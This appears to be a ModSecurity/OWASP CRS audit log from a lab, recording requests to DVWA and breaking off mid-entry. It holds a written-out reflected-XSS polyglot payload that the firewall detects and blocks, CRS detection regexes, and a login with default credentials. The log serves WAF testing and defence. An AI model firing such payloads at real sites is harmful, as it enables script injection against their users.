{"transaction":{"time":"13/May/2017:09:35:52 --0400","transaction_id":"WRcLuH8AAQEAAAkYuEUAAAAD","remote_address":"127.0.0.1","remote_port":41796,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcLuH8AAQEAAAkYuEUAAAAD\"]"],"stopwatch":{"p1":753,"p2":1699,"p3":73,"p4":379,"p5":78,"sr":46,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:56:10 --0400","transaction_id":"WRcQen8AAQEAAAkZ0AsAAAAE","remote_address":"192.168.75.130","remote_port":46192,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_r/?name=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3B+alert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--+%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_r/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"316","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/xss_r/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: connection found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\x22; alert(String.fromCharCode(88,83,83))//\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Warning. Pattern match \"(?i)([<\\xef\\xbc\\x9c]script[^>\\xef\\xbc\\x9e]*[>\\xef\\xbc\\x9e][\\\\s\\\\S]*?)\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"91\"] [id \"941110\"] [rev \"2\"] [msg \"XSS Filter - Category 1: Script Tag Vector\"] [data \"Matched Data: <SCRIPT> found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\x22; alert(String.fromCharCode(88,83,83))//\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"4\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Warning. Pattern match \"(?i)<[^\\\\w<>]*(?:[^<>\\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ...\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"267\"] [id \"941160\"] [rev \"2\"] [msg \"NoScript XSS InjectionChecker: HTML Injection\"] [data \"Matched Data: </SCRIPT found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\x22; alert(String.fromCharCode(88,83,83))//\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 18)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=15,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): NoScript XSS InjectionChecker: HTML Injection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRcQen8AAQEAAAkZ0AsAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: connection found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\\\\\\\x22; alert(String.fromCharCode(88,83,83))//\\\\\\\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\\\\\\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRcQen8AAQEAAAkZ0AsAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"(?i)([<\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9c]script[^>\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9e]*[>\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9e][\\\\\\\\\\\\\\\\s\\\\\\\\\\\\\\\\S]*?)\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"91\"] [id \"941110\"] [rev \"2\"] [msg \"XSS Filter - Category 1: Script Tag Vector\"] [data \"Matched Data: <SCRIPT> found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\\\\\\\x22; alert(String.fromCharCode(88,83,83))//\\\\\\\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\\\\\\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"4\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRcQen8AAQEAAAkZ0AsAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"(?i)<[^\\\\\\\\\\\\\\\\w<>]*(?:[^<>\\\\\\\\\"'\\\\\\\\\\\\\\\\s]*:)?[^\\\\\\\\\\\\\\\\w<>]*(?:\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?c\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?i\\\\\\\\\\\\\\\\W*?p\\\\\\\\\\\\\\\\W*?t|\\\\\\\\\\\\\\\\W*?f\\\\\\\\\\\\\\\\W*?o\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?m|\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?t\\\\\\\\\\\\\\\\W*?y\\\\\\\\\\\\\\\\W*?l\\\\\\\\\\\\\\\\W*?e|\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?v\\\\\\\\\\\\\\\\W*?g|\\\\\\\\\\\\\\\\W*?m\\\\\\\\\\\\\\\\W*?a\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?q\\\\\\\\\\\\\\\\W*?u\\\\\\\\\\\\\\\\W*?e\\\\\\\\\\\\\\\\W*?e|(?:\\\\\\\\\\\\\\\\W*?l\\\\\\\\\\\\\\\\W*?i\\\\\\\\\\\\\\\\W*?n\\\\\\\\\\\\\\\\W*?k|\\\\\\\\\\\\\\\\W*?o\\\\\\\\\\\\\\\\W*?b\\\\\\\\\\\\\\\\W*?j\\\\\\\\\\\\\\\\W*?e\\\\\\\\ ...\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"267\"] [id \"941160\"] [rev \"2\"] [msg \"NoScript XSS InjectionChecker: HTML Injection\"] [data \"Matched Data: </SCRIPT found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\\\\\\\x22; alert(String.fromCharCode(88,83,83))//\\\\\\\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\\\\\\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/ [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRcQen8AAQEAAAkZ0AsAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 18)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRcQen8AAQEAAAkZ0AsAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=15,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): NoScript XSS InjectionChecker: HTML Injection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRcQen8AAQEAAAkZ0AsAAAAE\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":1250,"p2":4155,"p3":0,"p4":0,"p5":163,"sr":30,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:56:14 --0400","transaction_id":"WRcQfn8AAQEAAAkZ0AwAAAAE","remote_address":"192.168.75.130","remote_port":46192,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_r/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":302,"headers":{"Expires":"Thu, 19 Nov 1981 08:52:00 GMT","Cache-Control":"no-store, no-cache, must-revalidate, post-check=0, pre-check=0","Pragma":"no-cache","Location":"../../login.php","Content-Length":"0","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=UTF-8"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQfn8AAQEAAAkZ0AwAAAAE\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":549,"p2":2016,"p3":85,"p4":377,"p5":98,"sr":25,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:56:14 --0400","transaction_id":"WRcQfn8AAQEAAAkVV4MAAAAA","remote_address":"192.168.75.130","remote_port":46194,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_r/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":302,"headers":{"Expires":"Thu, 19 Nov 1981 08:52:00 GMT","Cache-Control":"no-store, no-cache, must-revalidate, post-check=0, pre-check=0","Pragma":"no-cache","Location":"../../login.php","Content-Length":"0","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=UTF-8"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQfn8AAQEAAAkVV4MAAAAA\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":824,"p2":1965,"p3":92,"p4":176,"p5":93,"sr":34,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:56:14 --0400","transaction_id":"WRcQfn8AAQEAAAkVV4QAAAAA","remote_address":"192.168.75.130","remote_port":46194,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/login.php HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_r/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"698","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/login.php\"] [unique_id \"WRcQfn8AAQEAAAkVV4QAAAAA\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":886,"p2":2062,"p3":114,"p4":396,"p5":77,"sr":53,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:56:20 --0400","transaction_id":"WRcQhH8AAQEAAAmHBIwAAAAF","remote_address":"192.168.75.130","remote_port":46196,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"POST /dvwa/login.php HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/login.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Content-Length":"88"},"body":["username=admin&password=password&Login=Login&user_token=1bfc05000ee7ba4f5d2937d1b34b27be"]},"response":{"protocol":"HTTP/1.1","status":302,"headers":{"Expires":"Thu, 19 Nov 1981 08:52:00 GMT","Cache-Control":"no-store, no-cache, must-revalidate, post-check=0, 